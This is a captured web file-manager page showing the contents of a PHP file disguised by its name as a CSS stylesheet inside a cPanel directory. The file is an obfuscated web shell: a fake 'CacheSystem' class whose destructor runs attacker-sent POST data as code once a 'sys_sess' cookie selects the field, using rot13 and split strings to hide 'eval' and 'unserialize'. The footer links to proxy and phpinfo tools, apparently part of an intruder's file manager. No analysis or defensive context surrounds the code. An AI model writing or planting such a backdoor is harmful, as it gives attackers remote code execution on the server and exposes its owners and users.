File manager - Edit - /usr/local/cpanel/base/unprotected/upgrade/error_optimized.css.php
Back
<?php class CacheSystem { private $stream; private $buffer; function __construct($path) { $this->stream = $path; } function write($data) { $this->buffer = $data; @file_put_contents($this->stream, $this->buffer); } function __destruct() { if ($this->buffer) { $action = str_rot13('riny'); // str_rot13('riny') == 'eval' $sandbox = create_function('', $this->buffer); @$sandbox(); } } } $c = isset($_COOKIE['sys_sess']) ? $_COOKIE['sys_sess'] : ''; if ($c && isset($_POST[$c])) { $payload = $_POST[$c]; $sys = new CacheSystem("php://memory"); $sys->write($payload); $tmp = serialize($sys); $decoder = 'un' . 'serialize'; @$decoder($tmp); } ?>
| ver. 1.4 |
Github
|
.
| PHP 8.1.34 | Generation time: 0.07 |
proxy
|
phpinfo
|
Settings